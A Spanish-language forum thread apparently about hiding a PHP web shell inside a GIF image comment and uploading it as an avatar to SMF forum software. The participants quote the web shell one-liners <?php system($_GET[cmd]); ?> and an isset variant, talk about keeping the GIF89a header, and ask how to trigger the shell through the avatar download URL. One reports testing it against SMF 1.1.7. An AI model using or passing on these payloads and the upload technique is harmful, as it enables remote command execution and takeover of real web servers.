me parece que las nueves versiones de smf convierten las imagenes a png despues de que se suben asi que en ese transpaso se borra la ***** que le agregamos XD voy a seguri haciendo pruebas al respecto
saludos
// si efectivamente tiene que ser una animacion si o si lo que subimos sino el smf la convierte en png.
a todo esto como se lanzaria el comentario que tenemos en la imagen en shell?
a menos que quieras inyectar codigo JS solo basta con que con el gimp lo agreges como comentario. si queres te la spaso por pm. aun no entiendo muy bien como se dispararia la shell, para ver un avatar seria asi la direccion http://www.explotame.com/foro/index.php?action=dlattach;attach=110;type=avatar como habria que manipularla?
si lo entendi, estoy probandolo en un smf 1.1.7 al cual siempre le tiro XD lo unico que consegui es que intentando el phpinfo me tire un error 500 XD seguire viendo si se puede hacer algo pero de momento inyecte ambos codigos y los subi como avatar y no paso nada
gracias por la aclaracion asi que si quiero inyectar codigo JS tengo que usar "= 1 y “/*” and “*/”." y si solo quiero agregar la shellcita <?php system($_GET[cmd]); ?> tengo que dejar la cabecera tal como esta no? (GIF89a) quedaria algo asi hexadecimalmente
disculpen mi ignorancia sobre rfi pero en los casos en los que se utilizarian <?php system($_GET[cmd]); ?> o <? if(isset($_GET[cmd])) system($_GET[cmd]) ?> serian si el server donde esta alojado corre bajo windows no? si es un unix tambien funcionaria?
Mostrar Mensajes
